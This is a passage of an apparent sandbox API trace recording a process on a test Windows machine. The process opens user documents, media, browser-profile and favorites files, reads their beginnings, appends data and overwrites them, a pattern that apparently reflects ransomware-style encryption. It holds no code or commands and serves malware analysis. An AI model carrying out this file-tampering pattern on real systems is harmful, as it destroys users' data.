lpOverlapped=0x0) returned 1 [0180.561] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.561] WriteFile (in: hFile=0x1f0, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.562] CloseHandle (hObject=0x1f0) returned 1 [0180.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.569] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.569] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xef3 [0180.570] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.570] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.570] ReleaseMutex (hMutex=0x168) returned 1 [0180.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mimeTypes.rdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mimeTypes.rdf", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimeTypes.rdf", lpUsedDefaultChar=0x0) returned 13 [0180.571] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0xef3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f2bc*=0xef3, lpOverlapped=0x0) returned 1 [0180.598] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0180.598] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e92278*, nNumberOfBytesToWrite=0x147b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesWritten=0x2d5f2d0*=0x147b, lpOverlapped=0x0) returned 1 [0180.599] CloseHandle (hObject=0x1dc) returned 1 [0180.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QdxdVp_0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qdxdvp_0.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.600] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.600] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x110a3 [0180.600] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.600] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.600] ReleaseMutex (hMutex=0x168) returned 1 [0180.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QdxdVp_0.mkv", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QdxdVp_0.mkv", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QdxdVp_0.mkv", lpUsedDefaultChar=0x0) returned 12 [0180.600] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.601] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x100a3 [0180.601] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.601] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x100a3 [0180.601] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.601] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.602] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.602] CloseHandle (hObject=0x1dc) returned 1 [0180.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zTc6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ztc6.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.602] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.602] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x11686 [0180.602] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.602] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.602] ReleaseMutex (hMutex=0x168) returned 1 [0180.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zTc6.gif", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0180.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zTc6.gif", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zTc6.gif", lpUsedDefaultChar=0x0) returned 8 [0180.603] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.603] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x10686 [0180.604] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.604] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x10686 [0180.604] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.604] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.604] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.604] CloseHandle (hObject=0x1dc) returned 1 [0180.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5f3KYkg88jdH.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5f3kykg88jdh.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.605] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.605] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xb685 [0180.605] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.605] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.605] ReleaseMutex (hMutex=0x168) returned 1 [0180.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5f3KYkg88jdH.ppt", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0180.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5f3KYkg88jdH.ppt", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5f3KYkg88jdH.ppt", lpUsedDefaultChar=0x0) returned 16 [0180.605] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.606] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xa685 [0180.606] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.606] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xa685 [0180.606] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.606] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.606] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.607] CloseHandle (hObject=0x1dc) returned 1 [0180.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\xU-X2u kNWc_7MZX46J.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jlhpxbn7\\xu-x2u knwc_7mzx46j.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.607] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.607] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1673b [0180.607] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.607] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.607] ReleaseMutex (hMutex=0x168) returned 1 [0180.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="xU-X2u kNWc_7MZX46J.ots", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0180.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="xU-X2u kNWc_7MZX46J.ots", cchWideChar=23, lpMultiByteStr=0x1f88b2c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xU-X2u kNWc_7MZX46J.ots", lpUsedDefaultChar=0x0) returned 23 [0180.607] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.608] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1573b [0180.608] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.608] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1573b [0180.609] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.609] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.609] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.609] CloseHandle (hObject=0x1dc) returned 1 [0180.609] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\2kV wTr-SJiM.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\2kv wtr-sjim.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.609] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.609] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xfb0e [0180.610] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.610] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.610] ReleaseMutex (hMutex=0x168) returned 1 [0180.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2kV wTr-SJiM.csv", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0180.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2kV wTr-SJiM.csv", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2kV wTr-SJiM.csv", lpUsedDefaultChar=0x0) returned 16 [0180.610] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.611] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xeb0e [0180.611] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.611] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xeb0e [0180.611] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.612] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.612] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.612] CloseHandle (hObject=0x1dc) returned 1 [0180.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.612] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.613] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x50 [0180.613] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.613] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.613] ReleaseMutex (hMutex=0x168) returned 1 [0180.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0180.613] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f9e748, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9e748*, lpNumberOfBytesRead=0x2d5f2bc*=0x50, lpOverlapped=0x0) returned 1 [0180.614] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0180.614] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5d8, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5d8, lpOverlapped=0x0) returned 1 [0180.614] CloseHandle (hObject=0x1dc) returned 1 [0180.614] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.666] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.666] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x85 [0180.666] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.666] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.666] ReleaseMutex (hMutex=0x168) returned 1 [0180.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Autos.url", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Autos.url", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Autos.url", lpUsedDefaultChar=0x0) returned 13 [0180.666] ReadFile (in: hFile=0x1dc, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x2d5f2bc*=0x85, lpOverlapped=0x0) returned 1 [0180.667] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0180.667] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0180.667] CloseHandle (hObject=0x1dc) returned 1 [0180.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.669] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.669] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x85 [0180.669] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, 